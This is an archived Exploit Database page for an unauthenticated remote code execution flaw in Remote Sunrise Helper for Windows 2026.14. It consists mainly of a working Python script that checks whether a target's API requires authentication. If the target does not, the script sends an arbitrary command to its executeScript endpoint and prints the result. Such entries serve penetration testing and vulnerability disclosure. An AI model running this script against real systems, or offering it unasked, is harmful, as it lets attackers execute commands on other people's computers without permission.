[local] Remote Sunrise Helper for Windows 2026.14 - Remote Code Execution
Exploit DB
Archived May 15, 2026
✓ Full text saved
Remote Sunrise Helper for Windows 2026.14 - Remote Code Execution
Full text archived locally
EXPLOIT DATABASE
EXPLOITS
GHDB
PAPERS
SHELLCODES
SEARCH EDB
SEARCHSPLOIT MANUAL
SUBMISSIONS
ONLINE TRAINING
Remote Sunrise Helper for Windows 2026.14 - Remote Code Execution
EDB-ID:
52565
CVE:
N/A
EDB Verified:
Author:
CHOKRI HAMMEDI
Type:
LOCAL
Exploit: /
Platform:
WINDOWS
Date:
2026-05-15
Vulnerable App:
# Exploit Title: Remote Sunrise Helper for Windows 2026.14 -
Unauthenticated Remote Code Execution
# Date: 2026-04-20
# Exploit Author: Chokri Hammedi
# Software: https://rs.ltd/latest.php?os=win
# Vendor: https://rs.ltd/
# Version: 2026.14
# Tested on: Windows 10 / Windows 11
#!/usr/bin/env python3
import requests, json, sys, urllib3
urllib3.disable_warnings()
target = sys.argv[1]
cmd = sys.argv[2]
url = f"https://{target}:49762"
headers = {"X-HostName": "a", "X-ClientToken": "a", "X-HostFullModel": "a"}
r = requests.get(f"{url}/api/getVersion", verify=False, timeout=5)
data = r.json()
if data.get("requires.auth") == False:
r = requests.post(f"{url}/api/executeScript", headers={**headers,
"X-Script": cmd}, verify=False)
result = json.loads(r.text)
print(result.get('result', result.get('error', '')))
else:
print("[*] Not vulnerable - authentication required")
Copy
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services